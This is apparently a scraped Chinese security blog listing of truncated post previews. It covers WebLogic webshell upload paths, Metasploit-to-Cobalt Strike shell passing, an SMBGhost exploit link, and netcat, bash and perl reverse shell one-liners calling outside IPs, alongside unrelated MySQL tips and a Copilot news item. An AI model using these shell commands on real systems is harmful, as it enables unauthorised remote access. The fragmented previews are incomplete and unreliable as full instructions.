记weblogic上传shell路径
前言 === weblogic最近又出境了,小记一波。 路径 === 1、image目录 c:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp shell访问 http://xxxx/con...
51工具盒子
前言 === weblogic最近又出境了,小记一波。 路径 === 1、image目录 c:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp shell访问 http://xxxx/con...
前言 === 一般大家都是两款神器结合使用,自然少不了shell之间转换。 msf转cs ====== 首先cs创建一个windows/becon_http/reverse_http的 Listener 再用msf弹shell过去 msf exploit(handler) > use exploit/windows/local/payload_i...
前言 === 多的不用说,又是一个内网大杀器。win10用户真香。具体视频,我会在头条号(safe6安全)发布。 工具下载 ==== 奇安信的检测工具 http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip EXP下载地址 https://github.com/chompie1337/SMBGhost_R...
MySQL优化 ======= \*\*1. \*\* \*\*避免使用 select \* \*\* 你需要什么信息,就查询什么信息,查询的多了,查询的速度肯定就会慢 **2.** \*\*当你只需要查询出一条数据的时候,要使用 limit 1 \*\* 比如你要查询数据中是否有男生,只要查询一条含有男生的记录就行了,后面不需要再查了,使用Limit 1 可以在找到一条数...
前言 === 随便记录一下笔记,方便查询.最近是想到什么就记什么. 渗透测试mysql ========= 关于如何攻击mysql请直接看这篇\>[Mysql数据库渗透及漏洞利用总结](https://xz.aliyun.com/t/1491)写的很全 拿shell ====== 1前提需要知道网站的真实**物理路径** 2查看是否允许导入导出 ...
前言 === 刚刚用windows写了个脚本,拿到kali执行发现的问题(还是太垃圾了) 解决 === 用windows系统打开过的文档会被改为dos格式 dos格式:CR LF unix格式:LF 在vim中用\*\*:set ff**查看格式 用** :set ff=unix**和**:set ff=dos\*\*来改变格式
使用 === 正向shell: nc -lvvp 1988 -e /bin/bash nc 10.1.10.2 1988 //攻击鸡 反向shell: nc -e /bin/bash 152.54.56.4 1988 nc -lvvp 1988 //攻击鸡 注...
说明 === 分享一下各种版本的shell写法 bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM...
说明 === 涨姿势的文章日常分享 [通过MySQL LOAD DATA特性来达到任意文件读取](https://xz.aliyun.com/t/3973)
无论客户是否想要,微软都将其 AI 助手 Copilot 整合到其产品中,提供给客户,然后涨价,让客户为 AI 付费。微软最近将 Copilot 集成到了澳大利亚和东南亚国家的订阅服务 Microsoft 365 中,随后提高了订阅价格。用户抱怨 Copilot 就像微软 1990 年代饱受非议的 Clippy 助手一样惹人厌,澳大利亚用户还发现 Microsoft 365 的...